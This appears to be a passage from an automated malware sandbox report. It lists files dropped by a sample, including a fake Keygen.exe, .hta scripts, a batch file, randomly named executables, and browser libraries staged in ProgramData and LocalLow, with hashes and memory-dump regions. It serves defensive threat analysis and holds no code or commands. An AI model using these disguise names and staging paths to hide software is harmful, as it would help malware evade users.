              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\03L24JM1FJ.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\766E.tmp\Keygen.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\766E.tmp\Keygen.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\766E.tmp\b.hta
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\766E.tmp\b1.hta
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\766E.tmp\ba.hta
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\766E.tmp\ba1.hta
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\766E.tmp\m.hta
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\766E.tmp\m1.hta
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\766E.tmp\start.bat
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\CVhffgrdDFbv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\RfuDZIiMnF.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\RfuDZIiMnF.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\X8MTcYe6Ra.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ruY2MTTTCi.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\ruY2MTTTCi.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe
                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\zVhgfgjbnv.exe
                Download Submit

              • C:\Users\Public\bot.exe
                Download Submit

              • C:\Users\Public\bot.exe
                Download Submit

              • C:\Users\Public\kzv.exe
                Download Submit

              • C:\Users\Public\kzv.exe
                Download Submit

              • C:\Users\Public\kzv.exe
                Download Submit

              • C:\Users\Public\xsn.exe
                Download Submit

              • C:\Users\Public\xsn.exe
                Download Submit

              • C:\Users\Public\xsn.exe
                Download Submit

              • C:\Windows\temp\woblbiuz.inf
                Download Submit

              • \ProgramData\mozglue.dll
                Download Submit

              • \ProgramData\mozglue.dll
                Download Submit

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                Download Submit

              • \ProgramData\nss3.dll
                MD5

                bfac4e3c5908856ba17d41edcd455a51

                SHA1

                8eec7e888767aa9e4cca8ff246eb2aacb9170428

                SHA256

                e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                SHA512

                2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                Download Submit

              • \ProgramData\sqlite3.dll
                Download Submit

              • \ProgramData\sqlite3.dll
                Download Submit

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                Download Submit

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                Download Submit

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                Download Submit

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                MD5

                02cc7b8ee30056d5912de54f1bdfc219

                SHA1

                a6923da95705fb81e368ae48f93d28522ef552fb

                SHA256

                1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                SHA512

                0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                Download Submit

              • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                Download Submit

              • \Users\Admin\AppData\LocalLow\sqlite3.dll
                Download Submit

              • memory/496-9-0x0000000000000000-mapping.dmp

                Download

              • memory/688-24-0x0000000000000000-mapping.dmp

                Download

              • memory/968-15-0x0000000000000000-mapping.dmp

                Download

              • memory/1240-252-0x0000000000000000-mapping.dmp

                Download

              • memory/1320-255-0x0000000000400000-0x0000000000418000-memory.dmp

                Filesize

                96KB

                Download

              • memory/1320-260-0x00000000708F0000-0x0000000070FDE000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/1320-265-0x0000000002D30000-0x0000000002D35000-memory.dmp

                Filesize

                20KB

                Download

              • memory/1320-257-0x00000000004137EE-mapping.dmp

                Download

              • memory/1392-223-0x0000000000000000-mapping.dmp

                Download

              • memory/1432-28-0x0000000071080000-0x000000007176E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/1432-20-0x0000000000000000-mapping.dmp

                Download

              • memory/1432-51-0x0000000007120000-0x0000000007121000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2116-46-0x00000000077F0000-0x00000000077F1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2116-104-0x000000000ABC0000-0x000000000ABC1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/2116-27-0x0000000071080000-0x000000007176E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/2116-25-0x0000000000000000-mapping.dmp

                Download

              • memory/3080-10-0x0000000000000000-mapping.dmp

                Download

              • memory/3104-12-0x0000000000000000-mapping.dmp

                Download

              • memory/3116-239-0x00000000708F0000-0x0000000070FDE000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/3116-247-0x00000000015E0000-0x00000000015E1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3116-264-0x000000000C810000-0x000000000C84F000-memory.dmp

                Filesize

                252KB

                Download

              • memory/3116-241-0x0000000000E80000-0x0000000000E81000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3116-232-0x0000000000000000-mapping.dmp

                Download

              • memory/3204-69-0x0000000007F70000-0x0000000007F71000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3204-31-0x0000000000000000-mapping.dmp

                Download

              • memory/3204-32-0x0000000071080000-0x000000007176E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/3204-93-0x0000000009400000-0x0000000009401000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3384-6-0x0000000000000000-mapping.dmp

                Download

              • memory/3668-0-0x0000000000000000-mapping.dmp

                Download

              • memory/3784-22-0x0000000000000000-mapping.dmp

                Download

              • memory/3824-234-0x0000000000000000-mapping.dmp

                Download

              • memory/3856-3-0x0000000000000000-mapping.dmp

                Download

              • memory/3856-2-0x0000000000000000-mapping.dmp

                Download

              • memory/3864-14-0x0000000000000000-mapping.dmp

                Download

              • memory/3944-87-0x0000000009CB0000-0x0000000009CB1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3944-18-0x0000000000000000-mapping.dmp

                Download

              • memory/3944-81-0x0000000008730000-0x0000000008731000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3944-75-0x0000000008840000-0x0000000008841000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3944-29-0x0000000071080000-0x000000007176E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/3944-63-0x0000000008030000-0x0000000008031000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3952-39-0x0000000007350000-0x0000000007351000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3952-101-0x00000000096F0000-0x00000000096F1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3952-17-0x0000000000000000-mapping.dmp

                Download

              • memory/3952-99-0x0000000009740000-0x0000000009741000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3952-30-0x0000000071080000-0x000000007176E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/3952-33-0x0000000006CE0000-0x0000000006CE1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/3952-57-0x0000000007C00000-0x0000000007C01000-memory.dmp

                Filesize

                4KB

                Download

              • memory/4064-26-0x0000000071080000-0x000000007176E000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/4064-19-0x0000000000000000-mapping.dmp

                Download

              • memory/4192-256-0x0000000000000000-mapping.dmp

                Download

              • memory/4192-263-0x00000000708F0000-0x0000000070FDE000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/4192-288-0x0000000007EE0000-0x0000000007EE1000-memory.dmp

                Filesize

                4KB

                Download

              • memory/4200-254-0x000000000A9C0000-0x000000000A9FA000-memory.dmp

                Filesize

                232KB

                Download

              • memory/4200-244-0x0000000000940000-0x0000000000941000-memory.dmp

                Filesize

                4KB

                Download

              • memory/4200-231-0x00000000708F0000-0x0000000070FDE000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/4200-235-0x0000000000120000-0x0000000000121000-memory.dmp

                Filesize

                4KB

                Download

              • memory/4200-228-0x0000000000000000-mapping.dmp

                Download

              • memory/4220-159-0x000000000041A684-mapping.dmp

                Download

              • memory/4220-162-0x0000000000400000-0x0000000000424000-memory.dmp

                Filesize

                144KB

                Download

              • memory/4220-156-0x0000000000400000-0x0000000000424000-memory.dmp

                Filesize

                144KB

                Download

              • memory/4224-158-0x000000000043FA93-mapping.dmp

                Download

              • memory/4224-155-0x0000000000400000-0x0000000000497000-memory.dmp

                Filesize

                604KB

                Download

              • memory/4224-165-0x0000000000400000-0x0000000000497000-memory.dmp

                Filesize

                604KB

                Download

              • memory/4248-166-0x0000000000400000-0x0000000000497000-memory.dmp

                Filesize

                604KB

                Download

              • memory/4248-160-0x000000000043FA93-mapping.dmp

                Download

              • memory/4388-289-0x00000000708F0000-0x0000000070FDE000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/4388-283-0x0000000000000000-mapping.dmp

                Download

              • memory/4396-170-0x0000000000417A8B-mapping.dmp

                Download

              • memory/4396-177-0x0000000000400000-0x0000000000438000-memory.dmp

                Filesize

                224KB

                Download

              • memory/4404-172-0x000000000041A684-mapping.dmp

                Download

              • memory/4408-171-0x0000000000417A8B-mapping.dmp

                Download

              • memory/4408-178-0x0000000000400000-0x0000000000438000-memory.dmp

                Filesize

                224KB

                Download

              • memory/4408-167-0x0000000000400000-0x0000000000438000-memory.dmp

                Filesize

                224KB

                Download

              • memory/4644-211-0x0000000000000000-mapping.dmp

                Download

              • memory/4660-212-0x0000000000000000-mapping.dmp

                Download

              • memory/4724-209-0x0000000000000000-mapping.dmp

                Download

              • memory/4764-114-0x0000000000000000-mapping.dmp

                Download

              • memory/4772-115-0x0000000000000000-mapping.dmp

                Download

              • memory/4840-210-0x0000000000000000-mapping.dmp

                Download

              • memory/4956-132-0x0000000000000000-mapping.dmp

                Download

              • memory/4960-272-0x00000000004132DE-mapping.dmp

                Download

              • memory/4960-270-0x0000000000400000-0x0000000000418000-memory.dmp

                Filesize

                96KB

                Download

              • memory/4960-275-0x00000000708F0000-0x0000000070FDE000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/4980-134-0x0000000000000000-mapping.dmp

                Download

              • memory/4996-136-0x0000000000000000-mapping.dmp

                Download

              • memory/5016-138-0x0000000000000000-mapping.dmp

                Download

              • memory/5024-225-0x0000000000470000-0x0000000000471000-memory.dmp

                Filesize

                4KB

                Download

              • memory/5024-258-0x0000000006940000-0x0000000006964000-memory.dmp

                Filesize

                144KB

                Download

              • memory/5024-219-0x0000000000000000-mapping.dmp

                Download

              • memory/5024-242-0x0000000004D80000-0x0000000004D81000-memory.dmp

                Filesize

                4KB

                Download

              • memory/5024-253-0x0000000005080000-0x00000000050CE000-memory.dmp

                Filesize

                312KB

                Download

              • memory/5024-222-0x00000000708F0000-0x0000000070FDE000-memory.dmp

                Filesize

                6.9MB

                Download

              • memory/5024-236-0x0000000004E40000-0x0000000004E41000-memory.dmp

                Filesize

                4KB

                Download

              • memory/5072-144-0x0000000000000000-mapping.dmp

                Download

              • memory/5108-266-0x0000000000000000-mapping.dmp

                Download

              • memory/5108-280-0x0000000005010000-0x0000000005011000-memory.dmp

                Filesize

                4KB

                Download